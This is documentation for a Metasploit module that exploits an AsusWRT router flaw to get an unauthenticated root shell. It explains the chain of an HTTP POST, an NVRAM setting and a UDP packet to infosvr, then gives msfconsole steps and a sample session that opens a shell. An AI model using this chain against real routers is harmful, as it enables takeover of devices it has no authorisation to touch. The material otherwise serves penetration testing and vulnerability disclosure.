71 lines
2.3 KiB
Markdown
71 lines
2.3 KiB
Markdown
|
## Description
|
||
|
|
|
||
|
|
This module exploits a vulnerability in AsusWRT to execute arbitrary commands as `root`.
|
||
|
|
|
||
|
|
|
||
|
|
## Vulnerable Application
|
||
|
|
|
||
|
|
The HTTP server in AsusWRT has a flaw where it allows an unauthenticated client to perform a HTTP `POST` in certain cases. This can be combined with another vulnerability in the VPN configuration upload routine that sets NVRAM configuration variables directly from the `POST` request to enable a special command mode.
|
||
|
|
|
||
|
|
This command mode can then be abused by sending a UDP packet to the infosvr service, which is running on port UDP 9999 on the LAN interface, to launch the Telnet daemon on a random port and gain an interactive remote shell as the `root` user.
|
||
|
|
|
||
|
|
This module was tested successfully with a RT-AC68U running AsusWRT version 3.0.0.4.380.7743.
|
||
|
|
|
||
|
|
Numerous ASUS models are reportedly affected, but untested.
|
||
|
|
|
||
|
|
|
||
|
|
## Verification Steps
|
||
|
|
|
||
|
|
1. Start `msfconsole`
|
||
|
|
2. `use exploits/linux/http/asuswrt_lan_rce`
|
||
|
|
3. `set RHOST [IP]`
|
||
|
|
4. `run`
|
||
|
|
5. You should get a *root* session
|
||
|
|
|
||
|
|
|
||
|
|
## Options
|
||
|
|
|
||
|
|
**ASUSWRTPORT**
|
||
|
|
|
||
|
|
AsusWRT HTTP portal port (default: `80`)
|
||
|
|
|
||
|
|
|
||
|
|
## Scenarios
|
||
|
|
msf > use exploit/linux/http/asuswrt_lan_rce
|
||
|
|
msf exploit(linux/http/asuswrt_lan_rce) > set rhost 192.168.132.205
|
||
|
|
rhost => 192.168.132.205
|
||
|
|
msf exploit(linux/http/asuswrt_lan_rce) > run
|
||
|
|
|
||
|
|
[+] 192.168.132.205:9999 - Successfully set the ateCommand_flag variable.
|
||
|
|
[*] 192.168.132.205:9999 - Packet sent, let's sleep 10 seconds and try to connect to the router on port 51332
|
||
|
|
[+] 192.168.132.205:9999 - Success, shell incoming!
|
||
|
|
[*] Found shell.
|
||
|
|
[*] Command shell session 1 opened (192.168.135.111:36597 -> 192.168.132.205:51332) at 2018-01-25 14:51:12 -0600
|
||
|
|
|
||
|
|
id
|
||
|
|
id
|
||
|
|
/bin/sh: id: not found
|
||
|
|
/ # cat /proc/cpuinfo
|
||
|
|
cat /proc/cpuinfo
|
||
|
|
system type : Broadcom BCM53572 chip rev 1 pkg 8
|
||
|
|
processor : 0
|
||
|
|
cpu model : MIPS 74K V4.9
|
||
|
|
BogoMIPS : 149.91
|
||
|
|
wait instruction : no
|
||
|
|
microsecond timers : yes
|
||
|
|
tlb_entries : 32
|
||
|
|
extra interrupt vector : no
|
||
|
|
hardware watchpoint : yes
|
||
|
|
ASEs implemented : mips16 dsp
|
||
|
|
shadow register sets : 1
|
||
|
|
VCED exceptions : not available
|
||
|
|
VCEI exceptions : not available
|
||
|
|
|
||
|
|
unaligned_instructions : 0
|
||
|
|
dcache hits : 2147483648
|
||
|
|
dcache misses : 0
|
||
|
|
icache hits : 2147483648
|
||
|
|
icache misses : 0
|
||
|
|
instructions : 2147483648
|
||
|
|
/ #
|